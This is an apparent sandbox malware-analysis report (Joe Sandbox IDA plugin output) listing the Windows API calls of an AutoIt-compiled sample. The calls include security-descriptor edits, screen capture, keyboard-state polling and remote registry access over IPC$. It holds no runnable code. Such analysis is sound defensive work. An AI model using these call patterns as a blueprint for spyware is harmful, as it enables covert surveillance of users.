                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00ADA94D
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ADA969
                                                • GetLengthSid.ADVAPI32(?), ref: 00ADA986
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ADA995
                                                • HeapAlloc.KERNEL32(00000000), ref: 00ADA99C
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ADA9BD
                                                • CopySid.ADVAPI32(00000000), ref: 00ADA9C4
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ADA9F5
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ADAA1B
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ADAA2F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: dbda381d10c0720870d86d4686b15134b6ab2eadb60ab7343b36467373d09007
                                                • Instruction ID: c88df00bda5800ec8d389eea620f5e466cd4261ae334f9c674e709b70400f94a
                                                • Opcode Fuzzy Hash: dbda381d10c0720870d86d4686b15134b6ab2eadb60ab7343b36467373d09007
                                                • Instruction Fuzzy Hash: 3E514C71900209AFDF10DFA4DD95EEEBBB9FF14300F14811AF916A72A0DB359A06CB61
                                                APIs
                                                • GetDC.USER32(00000000), ref: 00AF9E36
                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AF9E42
                                                • CreateCompatibleDC.GDI32(?), ref: 00AF9E4E
                                                • SelectObject.GDI32(00000000,?), ref: 00AF9E5B
                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AF9EAF
                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00AF9EEB
                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AF9F0F
                                                • SelectObject.GDI32(00000006,?), ref: 00AF9F17
                                                • DeleteObject.GDI32(?), ref: 00AF9F20
                                                • DeleteDC.GDI32(00000006), ref: 00AF9F27
                                                • ReleaseDC.USER32(00000000,?), ref: 00AF9F32
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: 0cef9118cf032d554e6a687a2b48666dd816b2081c7f5a2e9a3910f378f0d5e9
                                                • Instruction ID: c60cbd9513241864652cf28d434a41ce84d5e68128c628bdfc9fabb3035db4a1
                                                • Opcode Fuzzy Hash: 0cef9118cf032d554e6a687a2b48666dd816b2081c7f5a2e9a3910f378f0d5e9
                                                • Instruction Fuzzy Hash: B5510775900309AFCB25CFA8CC85EAFBBB9EF48711F14891DFA59A7250D731A9418B90
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 2889450990-2391861430
                                                • Opcode ID: d1d9b34d1659e9ce9de0cbc86ab3040ed7a2919bdd334c689c07652686d37032
                                                • Instruction ID: e5237a80d52d76ec7fdffb71b18b71a7753ffce7cea0dc5e956192953305314e
                                                • Opcode Fuzzy Hash: d1d9b34d1659e9ce9de0cbc86ab3040ed7a2919bdd334c689c07652686d37032
                                                • Instruction Fuzzy Hash: 09516D72900149AADF15EBA4CE82EEEB7B8EF09350F100165F505731A2EB716E5ADF60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 2889450990-3420473620
                                                • Opcode ID: 1130eb8fdd0319242776d0d5eb67c039cad89bc0cfbd9f6c2381be83a8bfa4cb
                                                • Instruction ID: 432511d33cd956e4665601d45e9a1ee68318c790e13abc21906652d1debbb092
                                                • Opcode Fuzzy Hash: 1130eb8fdd0319242776d0d5eb67c039cad89bc0cfbd9f6c2381be83a8bfa4cb
                                                • Instruction Fuzzy Hash: D4518C72900249AADF15EBA0CE42EEEB7B8EF05350F100165F506731A2EB756F5ADF60
                                                APIs
                                                • _memset.LIBCMT ref: 00AE55D7
                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00AE5664
                                                • GetMenuItemCount.USER32(00B61708), ref: 00AE56ED
                                                • DeleteMenu.USER32(00B61708,00000005,00000000,000000F5,?,?), ref: 00AE577D
                                                • DeleteMenu.USER32(00B61708,00000004,00000000), ref: 00AE5785
                                                • DeleteMenu.USER32(00B61708,00000006,00000000), ref: 00AE578D
                                                • DeleteMenu.USER32(00B61708,00000003,00000000), ref: 00AE5795
                                                • GetMenuItemCount.USER32(00B61708), ref: 00AE579D
                                                • SetMenuItemInfoW.USER32(00B61708,00000004,00000000,00000030), ref: 00AE57D3
                                                • GetCursorPos.USER32(?), ref: 00AE57DD
                                                • SetForegroundWindow.USER32(00000000), ref: 00AE57E6
                                                • TrackPopupMenuEx.USER32(00B61708,00000000,?,00000000,00000000,00000000), ref: 00AE57F9
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AE5805
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID:
                                                • API String ID: 3993528054-0
                                                • Opcode ID: 217fbfa97375ffec33b5fc4cc25b4656e3786912296c1353d693696cac9bcd71
                                                • Instruction ID: dcf970e74f426a5c0ceb19ba256caedde0826fa0a45be94c714797a3f48ff75f
                                                • Opcode Fuzzy Hash: 217fbfa97375ffec33b5fc4cc25b4656e3786912296c1353d693696cac9bcd71
                                                • Instruction Fuzzy Hash: 2B710470A40685BFEB209B26EC49FAABF65FF4436CF284215F5146B1E1CBB05C10DB90
                                                APIs
                                                • _memset.LIBCMT ref: 00ADA1DC
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00ADA211
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00ADA22D
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00ADA249
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00ADA273
                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00ADA29B
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ADA2A6
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ADA2AB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 1687751970-22481851
                                                • Opcode ID: 16a6072faa8aff65e50fefe8c0ee38f1a5a40726e08e7dd8e1854be016adb9ad
                                                • Instruction ID: 3c8e3c83eb70914d8badb657a4a0b12c19b45165f8e6bcde86304390ace09de6
                                                • Opcode Fuzzy Hash: 16a6072faa8aff65e50fefe8c0ee38f1a5a40726e08e7dd8e1854be016adb9ad
                                                • Instruction Fuzzy Hash: 57410A76C10229ABDF25EBA4DD95DEDB7B8FF19710F004169F802A32A1DB319E05CB50
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B02BB5,?,?), ref: 00B03C1D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 3964851224-909552448
                                                • Opcode ID: f929aba12b1dfe29d759f8e0b3da1c6c1dc611bdf2d25cf4cfc779bb6a7a4626
                                                • Instruction ID: 58fbc2729c38cfade5ce1f5b4769cb9774e5b62b9b1d8de0542f6592f412e1de
                                                • Opcode Fuzzy Hash: f929aba12b1dfe29d759f8e0b3da1c6c1dc611bdf2d25cf4cfc779bb6a7a4626
                                                • Instruction Fuzzy Hash: 25415E7111024A8BDF00EF10E995AEA3BE9EF22744F5049E4EC551B2D2EB70EE4ADB50
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B136F4,00000010,?,Bad directive syntax error,00B3DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00AE25D6
                                                • LoadStringW.USER32(00000000,?,00B136F4,00000010), ref: 00AE25DD
                                                • _wprintf.LIBCMT ref: 00AE2610
                                                • __swprintf.LIBCMT ref: 00AE2632
                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AE26A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 1080873982-4153970271
                                                • Opcode ID: cf594f35dd9ca546a1b8bef89e0c2acc4f04bb92134d7cb9bb89d0e150761c18
                                                • Instruction ID: 959239798232de61100875439f84c562b03aab615b36edcfcb83197a62f053ff
                                                • Opcode Fuzzy Hash: cf594f35dd9ca546a1b8bef89e0c2acc4f04bb92134d7cb9bb89d0e150761c18
                                                • Instruction Fuzzy Hash: FA216D3290021AAFCF11BB90CD0AFEE7779FF19304F000599F505631A2DB71A629DB50
                                                APIs
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AE7B42
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AE7B58
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AE7B69
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AE7B7B
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AE7B8C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: SendString
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 890592661-1007645807
                                                • Opcode ID: 4d55a02ffe27f408b5d17cc283b631599bd5be29b0154bcc7f0d3f54dd2ac735
                                                • Instruction ID: 35f34f985289717592c34170dc828c8117e60055310474673ea4a606c9565cd5
                                                • Opcode Fuzzy Hash: 4d55a02ffe27f408b5d17cc283b631599bd5be29b0154bcc7f0d3f54dd2ac735
                                                • Instruction Fuzzy Hash: D711C8B194029979E720B362CC4AEFFBAFCEB96F50F000555B812A31D1EF600E49C6B0
                                                APIs
                                                • timeGetTime.WINMM ref: 00AE7794
                                                  • Part of subcall function 00ABDC38: timeGetTime.WINMM(?,7694B400,00B158AB), ref: 00ABDC3C
                                                • Sleep.KERNEL32(0000000A), ref: 00AE77C0
                                                • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00AE77E4
                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00AE7806
                                                • SetActiveWindow.USER32 ref: 00AE7825
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AE7833
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AE7852
                                                • Sleep.KERNEL32(000000FA), ref: 00AE785D
                                                • IsWindow.USER32 ref: 00AE7869
                                                • EndDialog.USER32(00000000), ref: 00AE787A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: 9038b877954c7aad9227fe92857b770b9aded609a8ba5ad0055bd691dd7ca632
                                                • Instruction ID: 4f885f17963cbff3324107e280db9ea9ae97b3a5cebea8c8f6e175a051614dc1
                                                • Opcode Fuzzy Hash: 9038b877954c7aad9227fe92857b770b9aded609a8ba5ad0055bd691dd7ca632
                                                • Instruction Fuzzy Hash: 17218CB1204285AFE7115F31EC89B2A3FA9FB14B49F100028F506832B2DFB98C42CB25
                                                APIs
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                • CoInitialize.OLE32(00000000), ref: 00AF034B
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AF03DE
                                                • SHGetDesktopFolder.SHELL32(?), ref: 00AF03F2
                                                • CoCreateInstance.OLE32(00B2DA8C,00000000,00000001,00B53CF8,?), ref: 00AF043E
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AF04AD
                                                • CoTaskMemFree.OLE32(?,?), ref: 00AF0505
                                                • _memset.LIBCMT ref: 00AF0542
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00AF057E
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AF05A1
                                                • CoTaskMemFree.OLE32(00000000), ref: 00AF05A8
                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00AF05DF
                                                • CoUninitialize.OLE32(00000001,00000000), ref: 00AF05E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                • String ID:
                                                • API String ID: 1246142700-0
                                                • Opcode ID: 296d71f9f8ae4527092c35cb36fc73516265f93401c5be5df508585181805350
                                                • Instruction ID: d4e6e7fac181fe01870428e954084c6a72d90897d456121dab714b86c19e9d05
                                                • Opcode Fuzzy Hash: 296d71f9f8ae4527092c35cb36fc73516265f93401c5be5df508585181805350
                                                • Instruction Fuzzy Hash: E3B1E975A00208AFDB14DFA4C988DAEBBB9FF49314B1484A9F906EB251DB70ED41CF50
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00AE2ED6
                                                • SetKeyboardState.USER32(?), ref: 00AE2F41
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00AE2F61
                                                • GetKeyState.USER32(000000A0), ref: 00AE2F78
                                                • GetAsyncKeyState.USER32(000000A1), ref: 00AE2FA7
                                                • GetKeyState.USER32(000000A1), ref: 00AE2FB8
                                                • GetAsyncKeyState.USER32(00000011), ref: 00AE2FE4
                                                • GetKeyState.USER32(00000011), ref: 00AE2FF2
                                                • GetAsyncKeyState.USER32(00000012), ref: 00AE301B
                                                • GetKeyState.USER32(00000012), ref: 00AE3029
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00AE3052
                                                • GetKeyState.USER32(0000005B), ref: 00AE3060
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 77e0ccf684c30e1fdd364f4bacb10c3798ee35499893035ab133f516b1d6b22a
                                                • Instruction ID: 8307070dcc27b50f9c660c78de535fcfbbea656ca27504760d1f8aa7308051a8
                                                • Opcode Fuzzy Hash: 77e0ccf684c30e1fdd364f4bacb10c3798ee35499893035ab133f516b1d6b22a
                                                • Instruction Fuzzy Hash: EF513921A087D829FF35EBB689147EABFF85F11380F08459DC5C2571C2DA949B8CC7A2
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 00ADED1E
                                                • GetWindowRect.USER32(00000000,?), ref: 00ADED30
                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ADED8E
                                                • GetDlgItem.USER32(?,00000002), ref: 00ADED99
                                                • GetWindowRect.USER32(00000000,?), ref: 00ADEDAB
                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ADEE01
                                                • GetDlgItem.USER32(?,000003E9), ref: 00ADEE0F
                                                • GetWindowRect.USER32(00000000,?), ref: 00ADEE20
                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ADEE63
                                                • GetDlgItem.USER32(?,000003EA), ref: 00ADEE71
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ADEE8E
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00ADEE9B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 5d634b549e11a93aa218eded0f3da1545fca23228fa7317033471baf1fc0af54
                                                • Instruction ID: 8c4169df6bb12ad58bc4f6eda5c756fb2367147350b1a7cdbdd36a7beaaa90c3
                                                • Opcode Fuzzy Hash: 5d634b549e11a93aa218eded0f3da1545fca23228fa7317033471baf1fc0af54
                                                • Instruction Fuzzy Hash: 3A510FB1B00205AFDB19DF69DD85AAEBBBAFB88701F14852DF51AD7290DB709D018B10
                                                APIs
                                                  • Part of subcall function 00ABB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ABB759,?,00000000,?,?,?,?,00ABB72B,00000000,?), ref: 00ABBA58
                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00ABB72B), ref: 00ABB7F6
                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00ABB72B,00000000,?,?,00ABB2EF,?,?), ref: 00ABB88D
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00B1D8A6
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ABB72B,00000000,?,?,00ABB2EF,?,?), ref: 00B1D8D7
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ABB72B,00000000,?,?,00ABB2EF,?,?), ref: 00B1D8EE
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00ABB72B,00000000,?,?,00ABB2EF,?,?), ref: 00B1D90A
                                                • DeleteObject.GDI32(00000000), ref: 00B1D91C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
